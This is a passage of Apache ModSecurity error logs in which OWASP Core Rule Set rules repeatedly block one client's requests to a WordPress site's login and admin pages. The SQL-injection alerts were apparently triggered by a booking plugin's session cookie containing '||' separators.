https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:03.743788 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIERw-Qm4vhlWBPlMjltQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:04.352943 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIERw-Qm4vhlWBPlMjltQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:04.860413 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIESA-Qm4vhlWBPlMjltwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:04.860701 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIESA-Qm4vhlWBPlMjltwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:05.424347 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIESA-Qm4vhlWBPlMjltwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:05.519336 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIESQ-Qm4vhlWBPlMjluQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:05.519612 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIESQ-Qm4vhlWBPlMjluQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:06.332353 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIESQ-Qm4vhlWBPlMjluQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:06.971767 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIESg-Qm4vhlWBPlMjlvAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:06.972048 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIESg-Qm4vhlWBPlMjlvAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:08.400982 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIESg-Qm4vhlWBPlMjlvAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:08.712247 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIETA-Qm4vhlWBPlMjlvgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:08.712533 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIETA-Qm4vhlWBPlMjlvgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:09.717526 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIETA-Qm4vhlWBPlMjlvgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:10.271917 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIETg-Qm4vhlWBPlMjlvwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:10.272224 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIETg-Qm4vhlWBPlMjlvwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:10.930389 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIETg-Qm4vhlWBPlMjlvwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:11.183974 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIETw-Qm4vhlWBPlMjlwQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:11.184460 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIETw-Qm4vhlWBPlMjlwQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:12.214047 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIETw-Qm4vhlWBPlMjlwQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:12.311671 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEUA-Qm4vhlWBPlMjlwwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:12.311954 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEUA-Qm4vhlWBPlMjlwwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.222763 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEUA-Qm4vhlWBPlMjlwwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.304918 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.305198 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.695301 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.954760 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:13.955054 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:15.134266 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEUQ-Qm4vhlWBPlMjlxgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:15.414116 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEUw-Qm4vhlWBPlMjlyQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:15.414421 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEUw-Qm4vhlWBPlMjlyQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:16.564270 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEUw-Qm4vhlWBPlMjlyQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:17.027054 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEVQ-Qm4vhlWBPlMjlywAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:17.027356 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEVQ-Qm4vhlWBPlMjlywAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:17.741270 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEVQ-Qm4vhlWBPlMjlywAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:18.190141 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id 